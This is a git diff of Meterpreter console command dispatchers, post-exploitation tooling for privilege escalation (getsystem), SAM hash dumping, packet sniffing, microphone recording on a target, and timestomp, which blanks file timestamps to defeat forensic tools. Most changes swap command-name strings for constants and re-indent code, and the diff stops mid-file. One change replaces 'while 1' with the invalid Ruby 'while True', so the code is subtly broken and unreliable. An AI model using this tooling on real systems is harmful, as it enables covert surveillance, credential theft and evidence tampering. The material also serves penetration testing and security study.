diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
index beb69a1d020b6..5c18d05956ec5 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb
@@ -22,16 +22,16 @@ class Console::CommandDispatcher::Lanattacks::Tftp
   #
   def commands
     all = {
-      "tftp_start"    => "Start the TFTP server",
-      "tftp_stop"     => "Stop the TFTP server",
-      "tftp_reset"    => "Reset the TFTP server",
-      "tftp_add_file" => "Add a file to the TFTP server"
+      'tftp_start'    => 'Start the TFTP server',
+      'tftp_stop'     => 'Stop the TFTP server',
+      'tftp_reset'    => 'Reset the TFTP server',
+      'tftp_add_file' => 'Add a file to the TFTP server'
     }
     reqs = {
-      "tftp_start"    => [ "lanattacks_start_tftp" ],
-      "tftp_stop"     => [ "lanattacks_stop_tftp" ],
-      "tftp_reset"    => [ "lanattacks_reset_tftp" ],
-      "tftp_add_file" => [ "lanattacks_add_tftp_file" ],
+      'tftp_start'    => [COMMAND_ID_LANATTACKS_START_TFTP],
+      'tftp_stop'     => [COMMAND_ID_LANATTACKS_STOP_TFTP],
+      'tftp_reset'    => [COMMAND_ID_LANATTACKS_RESET_TFTP],
+      'tftp_add_file' => [COMMAND_ID_LANATTACKS_ADD_TFTP_FILE],
     }
     filter_commands(all, reqs)
   end
@@ -40,7 +40,7 @@ def commands
   # Name for this dispatcher.
   #
   def name
-    "Lanattacks: TFTP"
+    'Lanattacks: TFTP'
   end
 
   @@tftp_start_opts = Rex::Parser::Arguments.new(
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
index 25db17ae41594..5782aed2d272a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
@@ -38,8 +38,8 @@ def initialize(shell)
   #
   def commands
     {
-      "networkpug_start" => "Start slinging packets between hosts",
-      "networkpug_stop"  => "Stop slinging packets between hosts",
+      'networkpug_start' => 'Start slinging packets between hosts',
+      'networkpug_stop'  => 'Stop slinging packets between hosts',
     }
   end
 
@@ -75,7 +75,7 @@ def setup_tapdev
   end
 
   def proxy_packets()
-    while 1
+    while True
       # Ghetto :\
 
       sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil)
@@ -175,7 +175,7 @@ def cmd_networkpug_start(*args)
 
     print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done")
 
-    response, @channel = client.networkpug.networkpug_start(interface, filter)
+    _, @channel = client.networkpug.networkpug_start(interface, filter)
 
     if(@channel)
       @thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) {
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index 18172d0416b2d..3b1647ae176ba 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -25,10 +25,10 @@ class Console::CommandDispatcher::Priv::Elevate
 
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
-      "All techniques available",
-      "Named Pipe Impersonation (In Memory/Admin)",
-      "Named Pipe Impersonation (Dropper/Admin)",
-      "Token Duplication (In Memory/Admin)"
+      'All techniques available',
+      'Named Pipe Impersonation (In Memory/Admin)',
+      'Named Pipe Impersonation (Dropper/Admin)',
+      'Token Duplication (In Memory/Admin)'
     ]
 
   #
@@ -36,7 +36,7 @@ class Console::CommandDispatcher::Priv::Elevate
   #
   def commands
     {
-      "getsystem" => "Attempt to elevate your privilege to that of local system."
+      'getsystem' => 'Attempt to elevate your privilege to that of local system.'
     }
   end
 
@@ -44,7 +44,7 @@ def commands
   # Name for this dispatcher.
   #
   def name
-    "Priv: Elevate"
+    'Priv: Elevate'
   end
 
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
index 9bb258c90ab74..584fac88f4636 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
@@ -22,7 +22,7 @@ class Console::CommandDispatcher::Priv::Passwd
   #
   def commands
     {
-      "hashdump" => "Dumps the contents of the SAM database"
+      'hashdump' => 'Dumps the contents of the SAM database'
     }
   end
 
@@ -30,7 +30,7 @@ def commands
   # Name for this dispatcher.
   #
   def name
-    "Priv: Password database"
+    'Priv: Password database'
   end
 
   #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
index 7af38ddeb84e6..6641222d3a779 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
@@ -2,163 +2,164 @@
 require 'rex/post/meterpreter'
 
 module Rex
-  module Post
-    module Meterpreter
-      module Ui
-        ###
-        #
-        # This class provides commands that interact with the timestomp feature set of
-        # the privilege escalation extension.
-        #
-        ###
-        class Console::CommandDispatcher::Priv::Timestomp
-          Klass = Console::CommandDispatcher::Priv::Timestomp
-
-          include Console::CommandDispatcher
-
-          @@timestomp_opts = Rex::Parser::Arguments.new(
-            "-m" => [ true,  "Set the \"last written\" time of the file" ],
-            "-a" => [ true,  "Set the \"last accessed\" time of the file" ],
-            "-c" => [ true,  "Set the \"creation\" time of the file" ],
-            "-e" => [ true,  "Set the \"mft entry modified\" time of the file" ],
-            "-z" => [ true,  "Set all four attributes (MACE) of the file" ],
-            "-f" => [ true,  "Set the MACE of attributes equal to the supplied file" ],
-            "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ],
-            "-r" => [ false, "Set the MACE timestamps recursively on a directory" ],
-            "-v" => [ false, "Display the UTC MACE values of the file" ],
-            "-h" => [ false, "Help banner" ]
-          )
-
-          #
-          # List of supported commands.
-          #
-          def commands
-            {
-              "timestomp" => "Manipulate file MACE attributes"
-            }
-          end
-
-          #
-          # Name for this dispatcher.
-          #
-          def name
-            "Priv: Timestomp"
-          end
-
-          #
-          # This command provides the same level of features that vinnie's command
-          # line timestomp interface provides with a similar argument set.
-          #
-          def cmd_timestomp(*args)
-            paths = []
-
-            modified  = nil
-            accessed  = nil
-            creation  = nil
-            emodified = nil
-
-            blank_file_mace = false
-            blank_directory_mace = false
-            get_file_mace = false
-            help = false
-
-            @@timestomp_opts.parse(args) do |opt, _idx, val|
-              case opt
-              when "-m"
-                modified  = str_to_time(val)
-              when "-a"
-                accessed  = str_to_time(val)
-              when "-c"
-                creation  = str_to_time(val)
-              when "-e"
-                emodified = str_to_time(val)
-              when "-z"
-                modified  = str_to_time(val)
-                accessed  = str_to_time(val)
-                creation  = str_to_time(val)
-                emodified = str_to_time(val)
-              when "-f"
-                print_status("Pulling MACE attributes from #{val}")
-                hash = client.priv.fs.get_file_mace(val)
-                if hash
-                  modified = hash['Modified']
-                  accessed = hash['Accessed']
-                  creation = hash['Created']
-                  emodified = hash['Entry Modified']
-                end
-              when "-b"
-                blank_file_mace = true
-              when "-r"
-                blank_directory_mace = true
-              when "-v"
-                get_file_mace = true
-              when "-h"
-                help = true
-              when nil
-                paths << val
-              end
-            end
-
-            if paths.empty?
-              print_line("\nNo paths specified.")
-              return nil
-            end
-
-            if !(modified || accessed || creation || emodified ||
-                 blank_file_mace || blank_directory_mace || get_file_mace) || help
-              print_line("\nUsage: timestomp <file(s)> OPTIONS\n" +
-                @@timestomp_opts.usage)
-              return nil
-            end
-
-            paths.uniq.each do |path|
-
-              # If any one of the four times were specified, change them.
-              if modified || accessed || creation || emodified
-                print_status("Setting specific MACE attributes on #{path}")
-                client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified)
-              end
-
-              if blank_file_mace
-                print_status("Blanking file MACE attributes on #{path}")
-                client.priv.fs.blank_file_mace(path)
-              end
-
-              if blank_directory_mace
-                print_status("Blanking directory MACE attributes on #{path}")
-                client.priv.fs.blank_directory_mace(path)
-              end
-
-              if get_file_mace
-                hash = client.priv.fs.get_file_mace(path)
-                print_status("Showing MACE attributes for #{path}")
-                print_line("Modified      : #{hash['Modified']}")
-                print_line("Accessed      : #{hash['Accessed']}")
-                print_line("Created       : #{hash['Created']}")
-                print_line("Entry Modified: #{hash['Entry Modified']}")
-              end
-            end
-          end
-
-          protected
-
-          #
-          # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS
-          #
-          def str_to_time(str) # :nodoc:
-            unless str.nil?
-              _r, mon, day, year, hour, min, sec =
-                str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a
-            end
-
-            if str.nil? || mon.nil?
-              raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})"
-            end
-
-            Time.mktime(year, mon, day, hour, min, sec, 0)
-          end
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# This class provides commands that interact with the timestomp feature set of
+# the privilege escalation extension.
+#
+###
+class Console::CommandDispatcher::Priv::Timestomp
+  Klass = Console::CommandDispatcher::Priv::Timestomp
+
+  include Console::CommandDispatcher
+
+  @@timestomp_opts = Rex::Parser::Arguments.new(
+    "-m" => [ true,  "Set the \"last written\" time of the file" ],
+    "-a" => [ true,  "Set the \"last accessed\" time of the file" ],
+    "-c" => [ true,  "Set the \"creation\" time of the file" ],
+    "-e" => [ true,  "Set the \"mft entry modified\" time of the file" ],
+    "-z" => [ true,  "Set all four attributes (MACE) of the file" ],
+    "-f" => [ true,  "Set the MACE of attributes equal to the supplied file" ],
+    "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ],
+    "-r" => [ false, "Set the MACE timestamps recursively on a directory" ],
+    "-v" => [ false, "Display the UTC MACE values of the file" ],
+    "-h" => [ false, "Help banner" ]
+  )
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+      'timestomp' => 'Manipulate file MACE attributes'
+    }
+  end
+
+  #
+  # Name for this dispatcher.
+  #
+  def name
+    'Priv: Timestomp'
+  end
+
+  #
+  # This command provides the same level of features that vinnie's command
+  # line timestomp interface provides with a similar argument set.
+  #
+  def cmd_timestomp(*args)
+    paths = []
+
+    modified  = nil
+    accessed  = nil
+    creation  = nil
+    emodified = nil
+
+    blank_file_mace = false
+    blank_directory_mace = false
+    get_file_mace = false
+    help = false
+
+    @@timestomp_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when "-m"
+        modified  = str_to_time(val)
+      when "-a"
+        accessed  = str_to_time(val)
+      when "-c"
+        creation  = str_to_time(val)
+      when "-e"
+        emodified = str_to_time(val)
+      when "-z"
+        modified  = str_to_time(val)
+        accessed  = str_to_time(val)
+        creation  = str_to_time(val)
+        emodified = str_to_time(val)
+      when "-f"
+        print_status("Pulling MACE attributes from #{val}")
+        hash = client.priv.fs.get_file_mace(val)
+        if hash
+          modified = hash['Modified']
+          accessed = hash['Accessed']
+          creation = hash['Created']
+          emodified = hash['Entry Modified']
         end
+      when "-b"
+        blank_file_mace = true
+      when "-r"
+        blank_directory_mace = true
+      when "-v"
+        get_file_mace = true
+      when "-h"
+        help = true
+      when nil
+        paths << val
       end
     end
+
+    if paths.empty?
+      print_line("\nNo paths specified.")
+      return nil
+    end
+
+    if !(modified || accessed || creation || emodified ||
+         blank_file_mace || blank_directory_mace || get_file_mace) || help
+      print_line("\nUsage: timestomp <file(s)> OPTIONS\n" +
+        @@timestomp_opts.usage)
+      return nil
+    end
+
+    paths.uniq.each do |path|
+
+      # If any one of the four times were specified, change them.
+      if modified || accessed || creation || emodified
+        print_status("Setting specific MACE attributes on #{path}")
+        client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified)
+      end
+
+      if blank_file_mace
+        print_status("Blanking file MACE attributes on #{path}")
+        client.priv.fs.blank_file_mace(path)
+      end
+
+      if blank_directory_mace
+        print_status("Blanking directory MACE attributes on #{path}")
+        client.priv.fs.blank_directory_mace(path)
+      end
+
+      if get_file_mace
+        hash = client.priv.fs.get_file_mace(path)
+        print_status("Showing MACE attributes for #{path}")
+        print_line("Modified      : #{hash['Modified']}")
+        print_line("Accessed      : #{hash['Accessed']}")
+        print_line("Created       : #{hash['Created']}")
+        print_line("Entry Modified: #{hash['Entry Modified']}")
+      end
+    end
+  end
+
+  protected
+
+  #
+  # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS
+  #
+  def str_to_time(str) # :nodoc:
+    unless str.nil?
+      _r, mon, day, year, hour, min, sec =
+        str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a
+    end
+
+    if str.nil? || mon.nil?
+      raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})"
+    end
+
+    Time.mktime(year, mon, day, hour, min, sec, 0)
   end
 end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb
index 7ac10d8daf362..2a21874008ab3 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb
@@ -29,9 +29,9 @@ def name
   #
   def commands
     {
-      'python_reset'              => 'Resets/restarts the Python interpreter',
-      'python_execute'            => 'Execute a python command string',
-      'python_import'             => 'Import/run a python file or module'
+      'python_reset'   => 'Resets/restarts the Python interpreter',
+      'python_execute' => 'Execute a python command string',
+      'python_import'  => 'Import/run a python file or module'
     }
   end
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index 6748e25d124c5..5c71863f33a9a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -30,21 +30,22 @@ def initialize(shell)
   def commands
     #all = {
     {
-      "sniffer_interfaces" => "Enumerate all sniffable network interfaces",
-      "sniffer_start" => "Start packet capture on a specific interface",
-      "sniffer_stop"  => "Stop packet capture on a specific interface",
-      "sniffer_stats" => "View statistics of an active capture",
-      "sniffer_dump"  => "Retrieve captured packet data to PCAP file",
-      "sniffer_release" => "Free captured packets on a specific interface instead of downloading them"
+      'sniffer_interfaces' => 'Enumerate all sniffable network interfaces',
+      'sniffer_start' => 'Start packet capture on a specific interface',
+      'sniffer_stop'  => 'Stop packet capture on a specific interface',
+      'sniffer_stats' => 'View statistics of an active capture',
+      'sniffer_dump'  => 'Retrieve captured packet data to PCAP file',
+      'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them'
     }
 
+    # TODO: Determine why these are commented out
     #reqs = {
-    #  "sniffer_interfaces" => ['sniffer_interfaces'],
-    #  "sniffer_start" => ['sniffer_capture_start'],
-    #  "sniffer_stop"  => ['sniffer_capture_stop'],
-    #  "sniffer_stats" => ['sniffer_capture_stats'],
-    #  "sniffer_dump"  => ['sniffer_capture_dump'],
-    #  "sniffer_release" => ['sniffer_capture_release']
+    #  'sniffer_interfaces' => [COMMAND_ID_NIFFER_INTERFACES],
+    #  'sniffer_start' =>      [COMMAND_ID_NIFFER_CAPTURE_START],
+    #  'sniffer_stop'  =>      [COMMAND_ID_NIFFER_CAPTURE_STOP],
+    #  'sniffer_stats' =>      [COMMAND_ID_NIFFER_CAPTURE_STATS],
+    #  'sniffer_dump'  =>      [COMMAND_ID_NIFFER_CAPTURE_DUMP],
+    #  'sniffer_release' =>    [COMMAND_ID_NIFFER_CAPTURE_RELEASE]
     #}
 
     #filter_commands(all, reqs)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
index 068ca77ae7632..5f43247cfdbb6 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
@@ -21,14 +21,9 @@ class Console::CommandDispatcher::Stdapi::AudioOutput
   # List of supported commands.
   #
   def commands
-    all = {
+    {
       'play' => 'play a waveform audio file (.wav) on the target system'
     }
-    reqs = {
-      'play' => []
-    }
-
-    filter_commands(all, reqs)
   end
 
   #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index 4feaf1430cc27..ed744476f8e2d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -98,28 +98,28 @@ def commands
 
     reqs = {
       'cat'        => [],
-      'cd'         => ['stdapi_fs_chdir'],
-      'checksum'   => CHECKSUM_ALGORITHMS.map { |a| "stdapi_fs_#{a}" },
-      'del'        => ['stdapi_fs_rm'],
-      'dir'        => ['stdapi_fs_stat', 'stdapi_fs_ls'],
+      'cd'         => [COMMAND_ID_STDAPI_FS_CHDIR],
+      'checksum'   => [COMMAND_ID_STDAPI_FS_MD5, COMMAND_ID_STDAPI_FS_SHA1],
+      'del'        => [COMMAND_ID_STDAPI_FS_RM],
+      'dir'        => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS],
       'download'   => [],
       'edit'       => [],
       'getlwd'     => [],
-      'getwd'      => ['stdapi_fs_getwd'],
+      'getwd'      => [COMMAND_ID_STDAPI_FS_GETWD],
       'lcd'        => [],
       'lpwd'       => [],
-      'ls'         => ['stdapi_fs_stat', 'stdapi_fs_ls'],
+      'ls'         => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS],
       'lls'        => [],
-      'mkdir'      => ['stdapi_fs_mkdir'],
-      'pwd'        => ['stdapi_fs_getwd'],
-      'rmdir'      => ['stdapi_fs_delete_dir'],
-      'rm'         => ['stdapi_fs_delete_file'],
-      'mv'         => ['stdapi_fs_file_move'],
-      'cp'         => ['stdapi_fs_file_copy'],
-      'chmod'      => ['stdapi_fs_chmod'],
-      'search'     => ['stdapi_fs_search'],
+      'mkdir'      => [COMMAND_ID_STDAPI_FS_MKDIR],
+      'pwd'        => [COMMAND_ID_STDAPI_FS_GETWD],
+      'rmdir'      => [COMMAND_ID_STDAPI_FS_DELETE_DIR],
+      'rm'         => [COMMAND_ID_STDAPI_FS_DELETE_FILE],
+      'mv'         => [COMMAND_ID_STDAPI_FS_FILE_MOVE],
+      'cp'         => [COMMAND_ID_STDAPI_FS_FILE_COPY],
+      'chmod'      => [COMMAND_ID_STDAPI_FS_CHMOD],
+      'search'     => [COMMAND_ID_STDAPI_FS_SEARCH],
       'upload'     => [],
-      'show_mount' => ['stdapi_fs_mount_show'],
+      'show_mount' => [COMMAND_ID_STDAPI_FS_MOUNT_SHOW],
     }
 
     filter_commands(all, reqs)
@@ -436,7 +436,6 @@ def cmd_download(*args)
     src_items = []
     last      = nil
     dest      = nil
-    continue  = false
     tries     = false
     tries_no  = 0
     opts      = {}
@@ -451,7 +450,6 @@ def cmd_download(*args)
         recursive = true
         opts['recursive'] = true
       when "-c"
-        continue = true
         opts['continue'] = true
       when "-l"
         tries = true
@@ -498,7 +496,7 @@ def cmd_download(*args)
       # Use search if possible for recursive pattern matching. It will work
       # more intuitively since it will not try to match on intermediate
       # directories, only file names.
-      if glob && recursive && client.commands.include?('stdapi_fs_search')
+      if glob && recursive && client.commands.include?(COMMAND_ID_STDAPI_FS_SEARCH)
 
         files = client.fs.file.search(src, glob, recursive)
         if !files.empty?
@@ -724,7 +722,7 @@ def cmd_ls(*args)
     # Check session capabilities
     is_glob = client.fs.file.is_glob?(path)
     if is_glob
-      if !client.commands.include?('stdapi_fs_search')
+      if !client.commands.include?(COMMAND_ID_STDAPI_FS_SEARCH)
         print_line('File globbing not supported with this session')
         return
       end
@@ -1013,7 +1011,7 @@ def cmd_upload_tabs(str, words)
   # sometimes it wouldn't execute successfully especailly on bad network.
   #
   def tab_complete_cfilenames(str, words)
-    if client.commands.include?('stdapi_fs_ls')
+    if client.commands.include?(COMMAND_ID_STDAPI_FS_LS)
       return client.fs.dir.match(str) rescue nil
     end
 
@@ -1024,7 +1022,7 @@ def tab_complete_cfilenames(str, words)
   # Provide a generic tab completion for client directory names.
   #
   def tab_complete_cdirectory(str, words)
-    if client.commands.include?('stdapi_fs_ls')
+    if client.commands.include?(COMMAND_ID_STDAPI_FS_LS)
       return client.fs.dir.match(str, true) rescue nil
     end
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
index e3b31ab41bc5b..14f5141ad0232 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
@@ -3,198 +3,198 @@
 require 'bindata'
 
 module Rex
-  module Post
-    module Meterpreter
-      module Ui
-
-        ###
-        #
-        # Mic - Capture audio from the remote system
-        #
-        ###
-        class Console::CommandDispatcher::Stdapi::Mic
-          Klass = Console::CommandDispatcher::Stdapi::Mic
-
-          include Console::CommandDispatcher
-
-          #
-          # List of supported commands.
-          #
-          def commands
-            all = {
-              'mic_start' => 'start capturing an audio stream from the target mic',
-              'mic_stop'  => 'stop capturing audio',
-              'mic_list'  => 'list all microphone interfaces',
-              'listen'    => 'listen to a saved audio recording via audio player'
-            }
-            reqs = {
-              'mic_start' => [ 'audio_mic_start' ],
-              'mic_stop'  => [ 'audio_mic_stop' ],
-              'mic_list'  => [ 'audio_mic_list' ],
-              'listen'    => [ 'audio_mic_start' ]
-            }
-
-            filter_commands(all, reqs)
-          end
-
-          #
-          # Name for this dispatcher
-          #
-          def name
-            "Stdapi: Mic"
-          end
-
-          def cmd_mic_list
-            client.mic.mic_list
-            if client.mic.mic_list.length == 0
-              print_error("No mics were found")
-              return
-            end
-
-            client.mic.mic_list.each_with_index do |name, indx|
-              print_line("#{indx + 1}: #{name}")
-            end
-          end
-
-          def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:)
-            subchunk1_size = 16
-            chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size)
-            byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8
-            block_align = num_channels * bits_per_sample / 8
-
-            [
-              BinData::Int32be.new(0x52494646),      # ChunkID: "RIFF"
-              BinData::Int32le.new(chunk_size),      # ChunkSize
-              BinData::Int32be.new(0x57415645),      # Format: "WAVE"
-              BinData::Int32be.new(0x666d7420),      # SubChunk1ID: "fmt "
-              BinData::Int32le.new(16),              # SubChunk1Size
-              BinData::Int16le.new(1),               # AudioFormat
-              BinData::Int16le.new(num_channels),    # NumChannels
-              BinData::Int32le.new(sample_rate_hz),  # SampleRate
-              BinData::Int32le.new(byte_rate),       # ByteRate
-              BinData::Int16le.new(block_align),     # BlockAlign
-              BinData::Int16le.new(bits_per_sample), # BitsPerSample
-              BinData::Int32be.new(0x64617461),      # SubChunk2ID: "data"
-              BinData::Int32le.new(data_size)        # SubChunk2Size
-            ]
-          end
-
-          def cmd_mic_start(*args)
-            get_data = lambda do |channel, file|
-              data = channel.read(65536)
-              if data
-                ::File.open(file, 'a') do |f|
-                  f.write(data)
-                end
-                return data.length
-              end
-              return 0
-            end
-            device_id = 1
-            duration = 1800
-            saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav"
-
-            mic_start_opts = Rex::Parser::Arguments.new(
-              "-h" => [ false, "Help Banner" ],
-              "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
-              "-m" => [ true, "Microphone device index to record from (1: system default)" ],
-              "-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ]
-            )
-
-            mic_start_opts.parse(args) do |opt, _idx, val|
-              case opt
-              when "-h"
-                print_line("Usage: mic_start [options]\n")
-                print_line("Streams and records audio from the target microphone.")
-                print_line(mic_start_opts.usage)
-                return
-              when "-d"
-                duration = val.to_i
-              when "-m"
-                device_id = val.to_i
-              when "-s"
-                saved_audio_path = val
-              end
-            end
-
-            mic_list = client.mic.mic_list
-            if mic_list.length == 0
-              print_error("Target does not have a mic")
-              return
-            end
-            if device_id < 1 || device_id > mic_list.length
-              print_error("Target does not have a mic with an id of #{device_id}")
-              return
-            end
-
-            channel = client.mic.mic_start(device_id)
-            if channel.nil?
-              print_error("Mic failed to start streaming.")
-              return
-            end
-            print_status("Saving to audio file: #{saved_audio_path}")
-            print_status("Streaming started...")
-            total_data_len = 0
-            begin
-              ::File.open(saved_audio_path, 'wb') do |outfile|
-                audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each {
-                  |e| e.write(outfile)
-                }
-              end
-              ::Timeout.timeout(duration) do
-                while client do
-                  Rex::sleep(0.5)
-                  total_data_len += get_data.call(channel, saved_audio_path)
-                end
-              end
-            rescue ::Timeout::Error
-            ensure
-              total_data_len += get_data.call(channel, saved_audio_path)
-              client.mic.mic_stop
-              print_status("Streaming stopped.")
-              # Now that we know the actual length of data, update the file header.
-              ::File.open(saved_audio_path, 'rb+') do |outfile|
-                outfile.seek(0, ::IO::SEEK_SET)
-                audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each {
-                  |e| e.write(outfile)
-                }
-              end
-            end
-          end
-
-          def cmd_listen(*args)
-            filename = nil
-
-            listen_opts = Rex::Parser::Arguments.new(
-              "-h" => [ false, "Help Banner" ],
-              "-f" => [ true, "audio filename" ]
-            )
-
-            listen_opts.parse(args) do |opt, _idx, val|
-              case opt
-              when "-h"
-                print_line("Usage: listen -f <filename>\n")
-                print_line("Plays saved audio from a file.")
-                print_line(listen_opts.usage)
-                return
-              when "-f"
-                filename = val
-              end
-            end
-
-            if filename.nil?
-              print_error("use '-f' option to provide a filename for playback")
-              return
-            end
-
-            Rex::Compat.play_sound(::File.expand_path(filename))
-          end
-
-          def cmd_mic_stop
-            client.mic.mic_stop
-          end
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Mic - Capture audio from the remote system
+#
+###
+class Console::CommandDispatcher::Stdapi::Mic
+  Klass = Console::CommandDispatcher::Stdapi::Mic
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      'mic_start' => 'start capturing an audio stream from the target mic',
+      'mic_stop'  => 'stop capturing audio',
+      'mic_list'  => 'list all microphone interfaces',
+      'listen'    => 'listen to a saved audio recording via audio player'
+    }
+    reqs = {
+      'mic_start' => [COMMAND_ID_STDAPI_AUDIO_MIC_START],
+      'mic_stop'  => [COMMAND_ID_STDAPI_AUDIO_MIC_STOP],
+      'mic_list'  => [COMMAND_ID_STDAPI_AUDIO_MIC_LIST],
+      'listen'    => [COMMAND_ID_STDAPI_AUDIO_MIC_START]
+    }
+
+    filter_commands(all, reqs)
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Stdapi: Mic"
+  end
+
+  def cmd_mic_list
+    client.mic.mic_list
+    if client.mic.mic_list.length == 0
+      print_error("No mics were found")
+      return
+    end
+
+    client.mic.mic_list.each_with_index do |name, indx|
+      print_line("#{indx + 1}: #{name}")
+    end
+  end
+
+  def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:)
+    subchunk1_size = 16
+    chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size)
+    byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8
+    block_align = num_channels * bits_per_sample / 8
+
+    [
+      BinData::Int32be.new(0x52494646),      # ChunkID: "RIFF"
+      BinData::Int32le.new(chunk_size),      # ChunkSize
+      BinData::Int32be.new(0x57415645),      # Format: "WAVE"
+      BinData::Int32be.new(0x666d7420),      # SubChunk1ID: "fmt "
+      BinData::Int32le.new(16),              # SubChunk1Size
+      BinData::Int16le.new(1),               # AudioFormat
+      BinData::Int16le.new(num_channels),    # NumChannels
+      BinData::Int32le.new(sample_rate_hz),  # SampleRate
+      BinData::Int32le.new(byte_rate),       # ByteRate
+      BinData::Int16le.new(block_align),     # BlockAlign
+      BinData::Int16le.new(bits_per_sample), # BitsPerSample
+      BinData::Int32be.new(0x64617461),      # SubChunk2ID: "data"
+      BinData::Int32le.new(data_size)        # SubChunk2Size
+    ]
+  end
+
+  def cmd_mic_start(*args)
+    get_data = lambda do |channel, file|
+      data = channel.read(65536)
+      if data
+        ::File.open(file, 'a') do |f|
+          f.write(data)
+        end
+        return data.length
+      end
+      return 0
+    end
+    device_id = 1
+    duration = 1800
+    saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav"
+
+    mic_start_opts = Rex::Parser::Arguments.new(
+      "-h" => [ false, "Help Banner" ],
+      "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
+      "-m" => [ true, "Microphone device index to record from (1: system default)" ],
+      "-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ]
+    )
+
+    mic_start_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when "-h"
+        print_line("Usage: mic_start [options]\n")
+        print_line("Streams and records audio from the target microphone.")
